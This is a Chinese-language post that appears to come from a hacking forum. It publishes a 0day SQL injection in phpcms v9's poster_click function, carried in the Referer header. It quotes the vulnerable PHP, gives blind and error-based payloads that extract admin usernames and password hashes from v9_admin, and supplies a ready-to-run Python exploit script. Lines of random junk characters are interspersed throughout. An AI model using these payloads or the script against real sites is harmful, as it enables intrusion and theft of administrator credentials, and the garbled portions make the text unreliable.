有人放出了 phpcms v9 的 0day（poster 模块通过 Referer 头的 SQL 注入），就随手写了个利用代码，其中注入代码有两种形式：
, B$ }& c) @- Y% s) ~9 U( c4 d) i" s
" d$ C# m% ]% e问题函数\phpcms\modules\poster\index.php* m% {. h' N, x" j7 x
* D" v1 m2 F( m2 M" R4 r3 Z! A, epublic function poster_click() {
$ s7 K s V6 Q n& R$id = isset($_GET['id']) ? intval($_GET['id']) : 0;8 k# e. {8 W9 D5 |7 Z. n9 x, ^
$r = $this->db->get_one(array('id'=>$id));
9 j% l) U7 y3 }1 n) `1 G! s* bif (!is_array($r) && empty($r)) return false;
6 }/ C M( W3 \2 m7 h' |8 z$ip_area = pc_base::load_sys_class('ip_area');+ A+ }; Q1 D/ j- j* V4 Q4 _
$ip = ip();
+ R- t$ D" _* I. h. l( P$area = $ip_area->get($ip);! i% j8 Y" M) F- I& a
$username = param::get_cookie('username') ? param::get_cookie('username') : '';! ?7 e$ C0 L" k- H* j X
if($id) {
0 H0 n$ d+ J& o3 j5 J$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
2 M! s8 Q3 k$ U6 J' v ]0 Q# i3 F$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
6 G" a( G: F( R3 J}
& \( s$ L; Z$ u4 J( U) T$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
( G- r# t; C, U7 i2 ?$setting = string2array($r['setting']);5 o% Z, b7 X _/ N
if (count($setting)==1) {3 Y) y2 o5 }/ H0 x2 @4 Z3 `
$url = $setting['1']['linkurl'];7 h7 q, ?' S& P4 A, ^! n5 v
} else {
) q+ N8 {, ?9 v- a2 j$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
8 }7 j* z4 C/ W- T: }; q2 ^}
+ Q+ E, Z* `' e6 v2 E* I/ Zheader('Location: '.$url);0 x% J, @- I5 v2 U0 f
}
( {* Z- m# T0 Y) h& m; U; X1 c* |' r$ w9 c
1 ?5 p% B! M' ~# I5 W ~( T i: t8 r6 h% C c
利用方式：
- K B$ @+ L7 }; B3 g* c3 Y' ~
1、可以采用盲注入（布尔盲注）的手法，payload 放在 Referer 头中：
[, {$ e9 t& E9 Q) V) Q, e! ~# W0 Y: C N1 r% i' }" G) h
referer: 1',(select password from v9_admin where userid=1 substr(password,4)='xxoo'),'1')#
' I- T7 c1 B3 k7 A% t( K3 B( j: x4 G8 \% J [9 y( c; L" Y
根据返回页面是否正常，逐个字符猜解密码字段。注意：上面条件里 `userid=1` 与 `substr(...)` 之间缺少连接词（如 AND），照抄是不能执行的；布尔盲注的前提是条件为真/为假时响应可区分。
6 k( q D+ `" Q8 g) Q( h6 l
2、报错注入：代码是花开写的，随手附上：
+ Z/ k" l( a3 F1 K2 H& Y; [. A2 [
1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#
此方法是报错注入手法：floor(rand(0)*2) 配合 group by 制造重复键错误，把查询结果带进 MySQL 的 "Duplicate entry" 报错信息中。前提是目标页面会回显数据库错误；另外若 v9_admin 表中不止一行，内层子查询需限制为单行，否则报的是 "Subquery returns more than 1 row" 而不是 Duplicate entry。
. \/ L4 B6 A6 f# D) v. ~
' o |" B. S9 f% `$ A! K1 V. y- Z9 q9 ~4 Q
利用程序（Python）：
#!/usr/bin/env python
import re
import sys

try:
    import http.client as httplib  # Python 3
except ImportError:  # Python 2
    import httplib
9 S% |4 J1 K; Q$ U
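def _extract_duplicate_entry(body):
    """Return every ``Duplicate entry '...'`` fragment found in *body*.

    *body* may be bytes (``HTTPResponse.read()`` on Python 3) or str; it is
    decoded leniently so a stray non-UTF-8 byte does not abort the run.
    """
    if isinstance(body, bytes):
        body = body.decode("utf-8", "replace")
    return re.findall(r"Duplicate entry \'\w+'", body)


def attack():
    """Send the error-based injection request and print what the server leaks.

    Command line: ``phpcmsattack.py <host> <path>`` -- ``sys.argv[1]`` is the
    host name (no scheme) and ``sys.argv[2]`` the application path, e.g. ``/``
    or ``/phpcmsv9/``. The payload travels in the ``Referer`` header, which
    poster_click() writes into the click table without escaping.

    The leaked ``username_password_encrypt`` value is only visible when the
    target echoes MySQL errors into the response. When it does not (or the
    injection fails) a short notice is printed instead of the original
    ``IndexError`` on an empty match list.
    """
    print("Code by Pax.Mac Team conqu3r!")
    print("Welcome to our zone!!!")
    host = sys.argv[1]
    paths = sys.argv[2]
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
        "Accept": "text/plain",
        # Error-based payload: floor(rand(0)*2) + GROUP BY forces a duplicate
        # key whose name carries the v9_admin row. Note the inner subquery is
        # not limited to one row; with several admins MySQL reports
        # "Subquery returns more than 1 row" instead.
        "Referer": "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#",
    }
    # rstrip avoids "//index.php" when the path is given as "/" or "/app/".
    # 'sitespaceid' is kept from the original request for parity only;
    # poster_click() reads 'id' (and optionally 'siteid').
    target = paths.rstrip("/") + "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2"
    # A timeout keeps an unresponsive host from hanging the script forever.
    conn = httplib.HTTPConnection(host, timeout=15)
    try:
        conn.request("GET", target, headers=headers)
        resp = conn.getresponse()
        body = resp.read()
    finally:
        conn.close()
    leaked = _extract_duplicate_entry(body)
    if leaked:
        print(leaked[0])
    else:
        print("No 'Duplicate entry' error in the %d-byte response (HTTP %s); "
              "the target may not echo MySQL errors or may not be vulnerable."
              % (len(body), resp.status))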
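if __name__ == "__main__":
    # Two positional arguments are required: target host and application path.
    if len(sys.argv) < 3:
        print("Code by Pax.Mac Team conqu3r")
        print("Usage:")
        # Use the real script name instead of two differently misspelled ones.
        print("  %s www.paxmac.org /" % sys.argv[0])
        print("  %s www.paxmac.org /phpcmsv9/" % sys.argv[0])
        sys.exit(1)
    attack()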
5 _2 p7 f: k1 B2 Y0 D) S |